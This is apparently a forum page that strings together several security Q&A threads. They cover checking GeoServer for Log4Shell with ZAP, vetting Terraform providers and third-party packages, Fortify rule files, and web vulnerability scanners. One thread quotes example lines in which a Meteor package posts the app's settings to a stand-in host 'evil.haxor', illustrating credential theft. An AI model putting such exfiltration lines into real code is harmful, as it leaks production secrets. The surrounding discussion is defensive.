I am trying to check the log4j vulnerability in GeoServer, On before and after updating the old log4j package to the new package which resolves the issue. For that, I am using the Zap tool for checking the vulnerability, where I found that active scan rule alpha. This rule attempts to discover the Log4Shell (CVE-2021-44228) vulnerability. checkout this link for more information https://www.zaproxy.org/docs/desktop/addons/active-scan-rules-alpha/.
And also I am little confused about how to execute this active scan rule alpha. please share some information about its execution.
My question is whether this is the right way to check this log4j vulnerability in GeoServer? or is there are any other ways for this?
You need to enable an OAST service (via Options / OAST) first.
You can either use one of the public ones we have pre-configured or stand up your own instance.
We also recommend that you scan headers as well as this vulnerability often is exposed by them.
For more details see this blog post :) https://www.zaproxy.org/blog/2021-12-14-log4shell-detection-with-zap/
Related
Using a lot of (official and non official) terraform providers, I'm looking for a tool to perform security analysis on terraform providers before executing terraform plan/apply commands (and so executing providers code). I want to prevent malicious code from providers to be executed blindly.
I'm basically executing terraform providers mirror command to save local copies of required providers and I'm wondering if I can security scan that result.
I tested kics, checkov and tfsec but they are all looking for security issues in my terraform static code but not in providers.
Do you have any good advices regarding this topic ?
This is actually quite a good question. There are many other problems that can be reduced to same generic question - how to make sure that the thing you downloaded from the internet does not do anything malicious to you like e.g.:
How to make sure that a minecraft plugin does not hack you?
How to make sure that a spring boot dependency does not hack you?
How to make sure that a library xxx you attach to your project does not do harm to you?
Should you use docker image yyy in your project?
Truth is: everything you use has the potential to explode right in your face (or more correctly: right into the face of the system owner). That's why the system owner (usually a company) defines a set of rules to follow what is allowed and what is not allowed. No set of rules you are aware of? Below a set of rules we came up with ourselves when thinking about on-boarding a new library for some projects to use:
Do not take random stuff from github. Take only products with longer history, small bug backlog, little to none past issues in the CVE list, actively maintained.
Do static code analysis yourself. Sometimes it is possible to have tools that work on binaries level do that for you. Sometimes you can do it on source level only. In case of Java libraries, check what tools like Dependency Track think about the library and version you are about to use.
Run the code and see how it works: what does it write, what does it read, what URLs does it communicate with (do a TCP dump if necessary).
Document everything you have done somewhere.
This gives you no 100% confidence that things will not go terribly wrong. But this is a systematic approach that will reduce the risk of doing something stupid.
As most of the IT folks know this vulnerability, I have a question on the affect it would have on the system that uses the libraries using log4j affected versions.
So let's say my app (APP_1) is dependent on dependency1.war. This dependency1.war is using say log4j 2.8.x version which is affected with the vulnerability mentioned.
How would this have an affect on the system APP_1 is deployed on and application itself (App_1)?
What would be a recommended way to safeguard against attacks?
Much thanks in advance :)
It is very likely that your app is at one point logging a value that is coming from a user, say a request parameter value. (This in itself is a bad programming practice but very common). If the user sends a request where this parameter is a specially crafted string then, because of this vulnerability, log4j would allow execution of another program on the host machine, for example
I've tested, and the two things are allowed in 3rd party pacakges:
Meteor.settings.foo = "foobar" # why u change my settings?
eval("HTTP.post('evil.haxor', Meteor.settings)") # nooooo
I want to be able to protect my settings from 3rd parties.
Scenario:
I have sensitive data in my Meteor.settings file, especially in production, because that is the current best-practice place to put them.
I use a 3rd party meteor package such as iron:router, but possibly one by a lesser known author.
One of the 3rd party packages looks up my Meteor.settings and does an HTTP post on which some of my settings are sent along.
HTTP.post('http://evil.haxor', Meteor.settings) # all ur settings
Boom. Instantly I've leaked my production credentials, my payment gateway, Amazon, or whatever. Worse, as far as I know, the code that steals my settings might be loaded in and eval'd so I don't even see the string "Meteor.settings" in the source of the package.
I've tested, and the two things are allowed in 3rd party pacakges:
Meteor.settings.foo = "foobar" # why u change my settings?
eval("HTTP.post('evil.haxor', Meteor.settings)") # nooooo
I'm amenable to hacky solutions. I know the Meteor team might not address this right away, given all on their plates (Windows support, a non-Mongo DB).. I just want to be able to provide this level of security to my company, for whom I think it would concern their auditors to discover this level of openness. Otherwise I fear I'm stuck manually security auditing every package I use.
Thank you for your consideration!
Edit: I see now that the risk of a package seeing/stealing the settings is essentially the same problem as any package reading (or writing) your filesystem. And the best way to address that would be to encrypt. That's a valid proposal, which I can use immediately. However, I think there could, and should be notions of 'package-scoped' settings. Also, the dialogue with commenters made me realize that the other issue, the issue of settings being (easily) modifiable at runtime, could be addressed via making the settings object read-only, using ES5 properties.
A malicious npm package can come with native code extensions, access the filesystem directly, and in general do anything the rest of the code in the app can do.
I see 2 (partial) solutions:
set up a firewall with outbound rules and logging. Unfortunately if your application communicates with any sort of social network (facebook, twitter) then the firewall idea will not handle malware that uses twitter as a way to transmit data. But maybe it would help?
lock down the DNS resolution, provide a whitelist of DNS lookups. This way you could spot if the app starts trying to communicate with 'evil.haxor'
There are other more advanced detectors - but at some point a hacker is going to go after the other services running on the box and not try for modifying your code.
Good luck. And its good to be paranoid -- because they really are out to get you.
I want to see the specific rules of Fortify Secure Coding Rules (the rules that Fortify uses by default), because I want to write a report about all rules that are used by Fortify:
I have tried to see them in C:\Program Files\Fortify Software\HP Fortify v3.60\Core\config\rules but I have found .bin files and I can't see them.
I also have opened AuditWorkbench and in Security Content Management I can't see them either.
Is there any way to see them?? Thanks for your help.
Short of becoming a Software Engineer at HP Fortify, No. The default rules are considered Intellectual Property of HP Fortify and no one outside Engineering has access to them.
What problem are you trying to solve by this report?
As HP/Fortify distributes rule-packs as binary files to protect their intellectual property, you will not be able to see how the individual rules are written.
However, if you're looking to include some information about which rules/rule-packs were used, you can navigate to the project summary screen and see which rule packs were used at the time of the scan. You will also have access to information such as each rule pack's version and additional meta data about each pack.
Being able to provide this level of detail in a meta-report might be sufficient to preempt follow-up questions. Just a thought...
The built in Fortify rules are not available to read and edit since it's the core intellectual property of the tool.
However, Fortify has published a taxonomy of what vulnerabilities are scanned, and their mapping to CWE:s. The link is here: https://vulncat.fortify.com/en/weakness
I am looking for a tool to scan a given URL for security vulnerabilities. I've googled around a bit and found a few but most of them require something that's publicly facing and my DEV environment isn't publicly facing, or they have some expensive solution that's more than I need for now. I don't need anything super powerful as I'm just doing lightweight testing for now, and the QA folk will run their more sophisticated battery of tests later.
EDIT: Use case for clarification
I hand the tool a URL to scan, ie: http://www.host.com/path/to/page.asp
It run a series of test on that pages to see if there are any possible security vulnerabilities it exposes. Examples include but are not limited to SQL injection, cross side scripting, etc.
Assuming that you wish to scan your web application, by providing the 'base' URL of the application to a penetration testing tool, you will find the OWASP Live CD project to be useful. Grendel-Scan available on the CD might prove to be most useful, since it appears to be the most mature among the penetration testing tools in the list. Nikito and the OWASP Wapiti project are the other penetration testing tools on the Live CD.
Additionally, the Watcher plug-in for Fiddler is also capable of detecting certain vulnerabilities in the application, although it requires that the individual pages in the application be visited with Fiddler as the proxy.
There are 2 forms of tools you will find for this, one type of tool has a list of known problems (bug in IIS version 5.34 or whatever) and goes through the list trying each issue. Tools of this kind also try common filenames like robots.txt and web.config etc. Nikito is an example of this type.
There is also the type that will look at all the querystring/cookie/form parameters and tweak them to try and trigger faults. I believe this is what would serve you best and for this I recommended burp proxy. http://portswigger.net/proxy/ There is a free version and a pro version. Also in this set of tools are expensive things like IBMs appscan and Hps webinspect.
Are you talking about scanning the URI that someone has requested from your site?
If so, you can use the .htaccess file to simply redirect to a 404 page any URI that doesn't exist or isn't found in the database (depending on how you're building the site).
You can therefore force requests to come in a specific way and anything that doesn't will automatically get canned.